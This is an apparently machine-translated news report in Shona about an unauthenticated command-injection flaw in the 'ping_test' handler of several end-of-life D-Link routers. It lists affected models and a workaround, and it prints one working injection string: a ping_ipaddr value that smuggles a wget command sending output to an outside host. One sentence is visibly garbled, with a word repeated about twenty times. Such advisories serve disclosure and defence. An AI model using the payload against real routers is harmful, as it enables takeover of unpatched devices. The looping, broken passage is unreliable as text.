Mune D-Link isina waya ma routers ngozi ine ngozi (), iyo inokutendera kuti uite kodhi kure kure parutivi rwechishandiso nekutumira chikumbiro chakakosha kumubati we "ping_test", inowanikwa pasina humbowo.
Sezvineiwo, maererano nevagadziri ve firmware, iyo "ping_test" kufona kunofanirwa kuitwa chete mushure mekusimbiswa, asi muchokwadi inodanwa chero zvakadaro, zvisinei nekupinda muwebhu interface. Kunyanya, kana uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchingedzera iyo "action=ping_test" parameter, iyo script inotungamira kune iyo yechokwadi peji, asi panguva imwechete inoita chiito chine chekuita neping_test. Kuita kodhi, kumwe kusagadzikana kwakashandiswa muping_test pachayo, iyo inodaidza iyo ping utility pasina kunyatso tarisisa kurongeka kwekero yeIP yakatumirwa kuongororwa. Semuenzaniso, kufonera wget utility uye kuendesa mhedzisiro ye "echo 1234" murairo kune wekunze muenzi, ingo tsanangura parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Kuvepo kwekusagadzikana kwakasimbiswa zviri pamutemo mumamodeli anotevera:
- DIR-655 ine firmware 3.02b05 kana kupfuura;
- DIR-866L ine firmware 1.03b04 kana kupfuura;
- DIR-1565 ine firmware 1.01 kana kupfuura;
- DIR-652 (hapana ruzivo nezve zvinetswa firmware shanduro inopihwa)
Nguva yekutsigira yemhando idzi yakatopera, saka D-Link , iyo isingasunungure zvigadziriso kwavari kuti ibvise kusagadzikana, haikurudzire kuvashandisa uye inopa zano kuvatsiva nemidziyo mitsva. Seyekuchengetedza workaround, unogona kudzikamisa kupinda kune yewebhu interface kune yakavimbika IP kero chete.
Zvakazoonekwa kuti vulnerability yaivewo mhando DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 uye DIR-825, zvirongwa zvekuburitsa zvigadziriso izvo zvisati zvazivikanwa.
Source: opennet.ru